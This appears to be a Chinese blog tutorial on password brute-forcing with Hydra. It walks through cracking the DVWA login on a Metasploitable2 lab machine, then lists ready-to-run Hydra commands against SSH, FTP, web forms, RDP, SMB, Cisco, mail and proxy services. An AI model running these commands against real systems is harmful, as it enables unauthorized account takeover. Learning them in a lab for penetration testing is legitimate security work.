准备:
靶机:metasploitable2
工具:hydra,burpsuite(或其他抓包工具)
还要准备密码字典


运行hydra,我们先hydra -h 查看一下用法:

(因为我用的是centos7系统,所以在hydra -h前有"./",在kali和windows里面是不需要的)
打开burpsuite开启抓包,点击 login
在burp中查看抓取的数据包

注意到这是以GET方式提交的,所以我们要选择hydra里的http-get-form模块
输入hydra -U http-get-form

构造基本命令:
hydra -L 用户名文件 -P 密码文件 http-get-form://192.168.61.129/OPT
再构造OPT命令

根据帮助与抓取的数据包构造OPT
"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=9ebdacd41850f604cae341e0e6230c65"
注意hydra中参数的分隔用的是":",在username和password后分别加^USER^,^PASS^。F=和H=分别表示失败特征与成功特征
失败特征就是显示"Username and/or password incorrect.",成功特征就是抓的包里Cookie那一行,注意要把其中的空格去掉。
合起来:hydra -L 用户名文件 -P 密码文件 http-get-form://192.168.61.129/"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=9ebdacd41850f604cae341e0e6230c65"

(用户名 密码都用字典的爆破就是很慢。。。)
得到用户名:admin,密码:password
以上为实例介绍。
语法介绍:
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip
http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
hydra这个工具用起来还是比较麻烦的,不是那种非常好上手的工具。
参考:
http://cstriker1407.info/blog/use-hydra-brute-kali-dvwa/#i-2
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/3713.html
浙公网安备 33010602011771号